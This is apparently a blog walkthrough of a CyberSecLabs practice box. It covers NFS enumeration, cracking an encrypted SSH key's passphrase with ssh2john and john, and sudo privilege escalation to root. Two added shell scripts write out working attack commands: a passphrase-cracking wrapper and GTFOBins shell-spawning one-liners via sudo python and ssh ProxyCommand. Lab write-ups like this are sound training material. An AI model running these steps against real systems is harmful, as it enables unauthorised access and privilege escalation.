As the first box I’m doing from the great guys over at CyberSecLabs (https://www.cyberseclabs.co.uk/), let’s fire it up and get to work!
After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (rpcbind), port 2049 (NFS), and port 27853 (running SSH!), as well as a few other high-numbered ports. SSH sitting on a non-standard high port stood out to me.
Starting with the easy win, NFS (Network File System): the nmap NSE output for port 111 (rpcbind, the RPC port mapper that NFS registers its services with) enumerated the exports, and we see the following mount:
We mount the export locally and see what we've got:
Thinking back to the SSH service on that high port, I bet the .ssh directory in the export is worth a look!
Unfortunately, when you try to log in with that private key you'll be prompted for a passphrase instead of getting in, and if you paid attention above you already know why: the key is …. ENCRYPTED! But have no fear, ssh2john is here!
Once ssh2john has converted the key into a hash that john understands, run john against it with the rockyou.txt wordlist to recover the passphrase for the original key!
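Before handing the key to a cracker it is worth confirming that it really is passphrase-protected and seeing which cipher guards it, because the two formats OpenSSH writes announce this differently. The script below is an added example and not code from the original post: it reports the cipher for PEM-format keys (from the Proc-Type/DEK-Info headers) and for native OpenSSH-format keys (by decoding the start of the base64 blob), then wraps the ssh2john and john steps. The ./id_rsa filename, the ssh2john location and the rockyou.txt path are my assumptions, and the sample key files it builds for the demonstration are constructed headers only, not real key material.

```shell
#!/bin/sh
# Added example (not from the original post). Assumptions: the key copied out
# of the NFS export is ./id_rsa, ssh2john is on PATH or at
# /usr/share/john/ssh2john.py, and rockyou.txt lives in /usr/share/wordlists.

# Print the cipher protecting a private key, or "none" if it is unprotected.
#   PEM format ("BEGIN RSA PRIVATE KEY"): a "Proc-Type: 4,ENCRYPTED" header
#       line marks encryption and "DEK-Info: <cipher>,<iv>" names the cipher.
#   OpenSSH format ("BEGIN OPENSSH PRIVATE KEY"): the base64 body decodes to
#       "openssh-key-v1\0", a 4-byte big-endian length, then the cipher name.
key_cipher() {
    keyfile=$1
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$keyfile"; then
        blob=$(mktemp)
        grep -v -- '-----' "$keyfile" | tr -d '\n' | base64 -d > "$blob"
        # bytes 16-19 hold the length of the cipher name, which starts at byte 20
        len=$(tail -c +16 "$blob" | head -c 4 | od -An -tu1 |
              awk '{ print $1*16777216 + $2*65536 + $3*256 + $4 }')
        tail -c +20 "$blob" | head -c "$len"
        echo
        rm -f "$blob"
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$keyfile"; then
        sed -n 's/^DEK-Info: \([^,]*\),.*/\1/p' "$keyfile"
    else
        echo none
    fi
}

# Exit status 0 when the key needs a passphrase.
key_is_encrypted() { [ "$(key_cipher "$1")" != none ]; }

# ssh2john turns the key into a john-format hash, john runs the wordlist over
# it, and --show prints the recovered passphrase. Needs the real tools installed.
crack_passphrase() {
    keyfile=$1
    wordlist=${2:-/usr/share/wordlists/rockyou.txt}
    if command -v ssh2john >/dev/null 2>&1; then
        ssh2john "$keyfile" > "$keyfile.hash"
    else
        python3 /usr/share/john/ssh2john.py "$keyfile" > "$keyfile.hash"
    fi
    john --wordlist="$wordlist" "$keyfile.hash"
    john --show "$keyfile.hash"
}

# Constructed fixtures: only the bytes key_cipher inspects are present, so
# these files are not usable keys.
make_sample_openssh_key() {
    cipher=$1; out=$2
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        {
            printf 'openssh-key-v1\000\000\000\000'        # magic + 3 high length bytes
            printf "$(printf '\\%03o' "${#cipher}")"        # low length byte
            printf '%s' "$cipher"
        } | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$out"
}

make_sample_pem_key() {
    cipher=$1; out=$2        # empty cipher => unencrypted PEM key
    {
        echo '-----BEGIN RSA PRIVATE KEY-----'
        if [ -n "$cipher" ]; then
            echo 'Proc-Type: 4,ENCRYPTED'
            echo "DEK-Info: $cipher,00112233445566778899AABBCCDDEEFF"
            echo
        fi
        echo 'bm90LWEtcmVhbC1rZXk='   # constructed body, not key material
        echo '-----END RSA PRIVATE KEY-----'
    } > "$out"
}

# Demonstration on the constructed fixtures (on the box the file is ./id_rsa).
tmp=$(mktemp -d)
make_sample_openssh_key aes256-ctr "$tmp/id_rsa.openssh_encrypted"
make_sample_openssh_key none       "$tmp/id_rsa.openssh_plain"
make_sample_pem_key AES-128-CBC    "$tmp/id_rsa.pem_encrypted"
for k in "$tmp"/*; do
    if key_is_encrypted "$k"; then
        echo "$(basename "$k"): protected with $(key_cipher "$k"); crack with: crack_passphrase $k"
    else
        echo "$(basename "$k"): unprotected; chmod 600 and use it directly"
    fi
done
rm -rf "$tmp"
```

Against the real key the flow is `key_is_encrypted ./id_rsa && crack_passphrase ./id_rsa`, followed by `chmod 600 ./id_rsa` and `ssh -i ./id_rsa -p 27853 <user>@shares.csl` with the recovered passphrase (the account name comes from the export, which the post does not reproduce).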
Now that we have the passphrase, don't forget to chmod 600 the original private key (ssh refuses to use a key with looser permissions), then log in with it against that high SSH port. Once in, run sudo -l, and we see that we're allowed to run /usr/bin/pkexec and /usr/bin/python3 as a user named amy.
Getting a shell as amy from here is trivial. Look up the python binary on GTFOBins and check its Sudo section, https://gtfobins.github.io/gtfobins/python/: running that one-liner through sudo -u amy drops us straight into a shell as amy.
As amy, don't forget to grab the access.txt flag, then run sudo -l again! This time we can run /usr/bin/ssh as any user we like, root included, with no password required!
A quick trip back to GTFOBins shows the way; look under Sudo on the ssh page: https://gtfobins.github.io/gtfobins/ssh/. The trick is that ssh runs its ProxyCommand through a shell before it ever connects, so under sudo that shell is root's.
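To make the two sudo -l findings concrete, here is an added example of my own, not code from the original post: a small parser that turns sudo -l output into one line per runnable command, a check of those commands against the GTFOBins Sudo entries the walkthrough relied on (python and ssh), and the two one-liners themselves. The sudo -l text embedded below is constructed to mirror what the post describes rather than copied from the box, the placement of NOPASSWD is an assumption, and "lowpriv" is a placeholder for the first account, which the post does not name.

```shell
#!/bin/sh
# Added example (not from the original post). The sudo -l samples are
# constructed to match what the post describes; "lowpriv" stands in for the
# unnamed first user and the NOPASSWD placement is an assumption.

SAMPLE_SUDO_L_FIRST_USER='Matching Defaults entries for lowpriv on shares:
    env_reset, mail_badpass

User lowpriv may run the following commands on shares:
    (amy) /usr/bin/pkexec, /usr/bin/python3'

SAMPLE_SUDO_L_AMY='User amy may run the following commands on shares:
    (ALL) NOPASSWD: /usr/bin/ssh'

# Turn sudo -l output into "runas:password|nopasswd:command", one per line.
# Only the rule lines after "may run the following commands" are considered;
# each starts with the run-as spec in parentheses, optionally "NOPASSWD:",
# then a comma-separated command list.
sudo_rules() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { inrules = 1; next }
        inrules && /^[[:space:]]*\(/ {
            line = $0
            sub(/^[[:space:]]*/, "", line)
            runas = line
            sub(/\).*/, "", runas); sub(/^\(/, "", runas)
            sub(/^\([^)]*\)[[:space:]]*/, "", line)
            tag = (line ~ /^NOPASSWD:/) ? "nopasswd" : "password"
            sub(/^NOPASSWD:[[:space:]]*/, "", line)
            n = split(line, cmds, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) print runas ":" tag ":" cmds[i]
        }'
}

# Flag rules whose binary has a Sudo entry on GTFOBins that this box relies on
# (python/python3 and ssh); anything else still deserves a manual GTFOBins lookup.
gtfobins_sudo_candidates() {
    sudo_rules "$1" | awk -F: '{
        n = split($3, p, "/"); bin = p[n]
        if (bin == "python" || bin == "python3" || bin == "ssh")
            print $0 " -> https://gtfobins.github.io/gtfobins/" (bin == "python3" ? "python" : bin) "/"
    }'
}

# GTFOBins Sudo entry for python: run the interpreter as amy and have it spawn
# a shell, which inherits amy's identity.
shell_as_amy() {
    sudo -u amy /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
}

# GTFOBins Sudo entry for ssh: ProxyCommand is handed to a shell before any
# connection is attempted, so the host "x" never needs to resolve and the
# shell runs as root. 0<&2 1>&2 point the shell's stdin/stdout at the
# terminal ssh still holds on stderr, giving an interactive root shell.
root_shell_via_ssh() {
    sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
}

# Demonstration on the constructed samples.
echo '== sudo -l as the first user =='
gtfobins_sudo_candidates "$SAMPLE_SUDO_L_FIRST_USER"
echo '== sudo -l as amy =='
gtfobins_sudo_candidates "$SAMPLE_SUDO_L_AMY"
```

On the box itself, `gtfobins_sudo_candidates "$(sudo -l)"` runs the check against the live output; `shell_as_amy` is the step after the first sudo -l and `root_shell_via_ssh` the step after the second.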
Thanks for tuning in to the first box I've tackled in the Beginner section of CyberSecLabs! I'm truly enjoying the quality of the content they're providing so far. Stay tuned for more!